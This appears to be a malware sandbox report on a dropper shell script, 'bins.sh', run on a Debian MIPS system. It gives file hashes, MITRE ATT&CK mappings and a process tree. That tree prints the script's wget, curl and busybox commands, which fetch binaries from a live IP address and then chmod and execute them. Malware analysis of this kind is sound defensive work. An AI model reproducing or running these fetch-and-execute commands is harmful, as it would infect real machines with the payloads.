956b4f4c2b994b61a3f395db42c7eb576bbf306dc75d2f7c97cc02d71b0f2f23

Analysis

max time kernel
149s
max time network
11s
platform
debian-9_mips
resource
debian9-mipsbe-20240611-en
resource tags

arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
21-11-2024 16:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

534a73324bdffc21d98727b2f74568ce
SHA1

89685be31befce3ea973d79dacec145875bc5dbb
SHA256

956b4f4c2b994b61a3f395db42c7eb576bbf306dc75d2f7c97cc02d71b0f2f23
SHA512

7c07c3c58e7d98e393d7ba902a3e57df1a6d8c9b6e4b74f0c8d6ddb683032112bb4b9af3b0d445f83ef69cb76438d236bcc6fe107738c3e1e5fb2b95638b11c1
SSDEEP

192:kd9bUApimONfVQbfBVvKaIyOfmmEhDe5BVvKa6dmmEhAd9bUAdimONfVp:kd9bUADbfBVvKaIyOfmmEhDe5BVvKa6S

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 1 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
739	chmod

Executes dropped EXE 1 IoCs

ioc	pid	Process
/tmp/C7cT6xn0KbL7RzhVfL7sQQTw9ObUT5dJYT	740	C7cT6xn0KbL7RzhVfL7sQQTw9ObUT5dJYT

Reads runtime system information 2 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

Writes file to tmp directory 5 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/C7cT6xn0KbL7RzhVfL7sQQTw9ObUT5dJYT	busybox
File opened for modification	/tmp/wADa8E6iEluhrUq1mrydTV91psq5G5jsmq	wget
File opened for modification	/tmp/wADa8E6iEluhrUq1mrydTV91psq5G5jsmq	curl
File opened for modification	/tmp/C7cT6xn0KbL7RzhVfL7sQQTw9ObUT5dJYT	wget
File opened for modification	/tmp/C7cT6xn0KbL7RzhVfL7sQQTw9ObUT5dJYT	curl

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:709
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:712
- /usr/bin/wget
  wget http://216.126.231.240/bins/C7cT6xn0KbL7RzhVfL7sQQTw9ObUT5dJYT
  2⤵
  - Writes file to tmp directory
  PID:715
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/C7cT6xn0KbL7RzhVfL7sQQTw9ObUT5dJYT
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:736
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/C7cT6xn0KbL7RzhVfL7sQQTw9ObUT5dJYT
  2⤵
  - Writes file to tmp directory
  PID:738
- /bin/chmod
  chmod 777 C7cT6xn0KbL7RzhVfL7sQQTw9ObUT5dJYT
  2⤵
  - File and Directory Permissions Modification
  PID:739
- /tmp/C7cT6xn0KbL7RzhVfL7sQQTw9ObUT5dJYT
  ./C7cT6xn0KbL7RzhVfL7sQQTw9ObUT5dJYT
  2⤵
  - Executes dropped EXE
  PID:740
- /bin/rm
  rm C7cT6xn0KbL7RzhVfL7sQQTw9ObUT5dJYT
  2⤵
  PID:742
- /usr/bin/wget
  wget http://216.126.231.240/bins/wADa8E6iEluhrUq1mrydTV91psq5G5jsmq
  2⤵
  - Writes file to tmp directory
  PID:743
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/wADa8E6iEluhrUq1mrydTV91psq5G5jsmq
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:744
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/wADa8E6iEluhrUq1mrydTV91psq5G5jsmq
  2⤵
  PID:790

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/C7cT6xn0KbL7RzhVfL7sQQTw9ObUT5dJYT

Filesize
98KB

MD5
5141342d0df8699fa32a6b066a0c592e

SHA1
8157673225bd5182f16215e2aa823a25ca2d4fbc

SHA256
54302d130cd356fb19ea5a763c5ab6b0892fc234118f10ba3196ec4245c83b4d

SHA512
d6b24571e7691227abafc70133a1da007c97c2730c820de77a750d2c140a8a75554cc614b4729debc4ec5480124252737c5846a458a5146005285c6d3f9e3801

Download Submit
/tmp/wADa8E6iEluhrUq1mrydTV91psq5G5jsmq

Filesize
141KB

MD5
3ca8decdb1e52c423c521bfff02ac200

SHA1
8621ecd6807109b8541912ad9e134f6fb49bfd48

SHA256
dee3a1252e88f188c362e08b16ece678559ad2566511871f5cde69296f6c779f

SHA512
b6f89d7875d584c109f30814738fec4fe04619745941d9cbbff20bbefbab454dee7180321f6913da1a3b89fba2dc743b28631e52261539d091cc802a5c7a1c7a

Download Submit